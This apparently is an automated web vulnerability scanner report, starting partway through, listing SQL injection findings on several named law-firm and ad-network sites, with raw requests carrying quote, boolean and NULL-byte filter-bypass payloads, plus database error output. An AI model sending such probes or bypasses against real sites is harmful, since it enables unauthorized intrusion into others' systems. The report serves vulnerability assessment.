GET /red/psi/sites/www.tydingslaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2FContent.aspx%3Ftopic%3DAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back&ref=http%3A%2F%2Fwww.tydingslaw.com%2FPracticesIndustries%2Fpid%2F7%2FCommercial-and-Business-Litigation-.aspx&3vpnn2 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X'%20and%201%3d1--%20; di=1305201657.1OD|1305200976.1FE|1305200976.60; uit=1

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 510
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:12:04 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:12:04 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216724.1FE|1305216724.1OD|1305216724.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:11:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:12:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:12:04 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.tydingslaw.com%2fContent.aspx%3ftopic%3dAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back"],"segments" : ["1FE","1OD","60"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

Request 2

GET /red/psi/sites/www.tydingslaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2FContent.aspx%3Ftopic%3DAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back&ref=http%3A%2F%2Fwww.tydingslaw.com%2FPracticesIndustries%2Fpid%2F7%2FCommercial-and-Business-Litigation-.aspx&3vpnn2 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X'%20and%201%3d2--%20; di=1305201657.1OD|1305200976.1FE|1305200976.60; uit=1

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 412
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:12:04 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:12:04 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216724.1FE|1305216724.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:11:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:12:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:12:04 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.tydingslaw.com%2fContent.aspx%3ftopic%3dAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back"],"segments" : ["1FE","60"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

1.2. http://layserfreiwald.com/attorneys.html [AID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://layserfreiwald.com
Path:   /attorneys.html

Issue detail

The AID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.html?mode=view&AID=8' HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.1.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 18:13:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 7379
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Line 4: Incorrect syntax near ''.</td>
...[SNIP]...

1.3. http://www.mccarter.com/new/biosnew.aspx [Initial parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/biosnew.aspx

Issue detail

The Initial parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Initial parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /new/biosnew.aspx?ShowLast=True&Initial=H' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/biosnew.aspx?search=&Location=
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response 1

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 18:05:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6305

<html>
<head>
<title>Unclosed quotation mark after the character string ')ORDER BY dbo.Bios.[Last], dbo.Bios.[First]'.
Incorrect syntax near ')ORDER BY dbo.Bios.[Last], dbo.Bios.[First]'.</title>
...[SNIP]...

Request 2

GET /new/biosnew.aspx?ShowLast=True&Initial=H'' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/biosnew.aspx?search=&Location=
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:05:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26603


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML>
   <HEAD>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,N
...[SNIP]...

1.4. http://www.mccarter.com/new/homenew.aspx [show parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433%00' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?9c236--%3E%3Cscript%3Ealert(%22OOPS%22)%3C/script%3Eec7143486da=1
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:17:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4745

<html>
<head>
<title>Unclosed quotation mark after the character string ''.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...

1.5. http://www.mccarter.com/new/showbionew.aspx [show parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/showbionew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the show parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /new/showbionew.aspx?show=997'&Related= HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showbionew&show=997
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response 1

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:17:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4643

<html>
<head>
<title>Unclosed quotation mark after the character string '997''.
Incorrect syntax near '997''.</title>
<style>
   body {font-family:"Verdana";font-weight:
...[SNIP]...

Request 2

GET /new/showbionew.aspx?show=997''&Related= HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showbionew&show=997
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response 2

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 16:17:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /new/biosnew.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/new/biosnew.aspx'>here</a>.</h2>
</body></html>

1.6. http://www.mccarter.com/new/showcareerpagenew.aspx [show parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/showcareerpagenew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /new/showcareerpagenew.aspx?show=1284%00' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showcareerpagenew.aspx&show=1284
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:16:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4482

<html>
<head>
<title>Unclosed quotation mark after the character string ''.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...

1.7. http://www.mccarter.com/new/showeventnew.aspx [show parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/showeventnew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /new/showeventnew.aspx?show=6164%00' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/eventsnew.aspx
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:17:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4602

<html>
<head>
<title>Unclosed quotation mark after the character string ' order by [startdate] desc'.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;fo
...[SNIP]...

1.8. http://www.mccarter.com/new/showlocationnew.aspx [show parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/showlocationnew.aspx

Issue detail

The show parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /new/showlocationnew.aspx?show=1433' HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:16:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4478

<html>
<head>
<title>Unclosed quotation mark after the character string ''.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...

1.9. http://www.peckshaffer.com/bonds.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peckshaffer.com
Path:   /bonds.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /bonds.php?page=/1'news HTTP/1.1
Host: www.peckshaffer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.peckshaffer.com/home.php

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:32 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 319
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Bonds : Start -->


error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'news' LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...

Request 2

GET /bonds.php?page=/1''news HTTP/1.1
Host: www.peckshaffer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.peckshaffer.com/home.php

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:32 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15196

<!-- Bonds : Start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...

1.10. http://www.peckshaffer.com/bonds.php [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peckshaffer.com
Path:   /bonds.php

Issue detail

The page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the page parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /bonds.php?page=news' HTTP/1.1
Host: www.peckshaffer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.peckshaffer.com/home.php

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:23 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 324
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Bonds : Start -->


error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''bond news'' LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...

Request 2

GET /bonds.php?page=news'' HTTP/1.1
Host: www.peckshaffer.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.peckshaffer.com/home.php

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:23 GMT
Server: Apache/2.0.46 (Red Hat)
X-Powered-By: PHP/4.4.2
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15196

<!-- Bonds : Start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...

1.11. http://www.pillsburylaw.com/ [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 20752209%20or%201%3d1--%20 and 20752209%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953720752209%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 12-May-2010 19:51:08 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953720752209%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11825829;path=/
Set-Cookie: CFTOKEN=73112688;path=/
Date: Thu, 12 May 2011 19:51:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

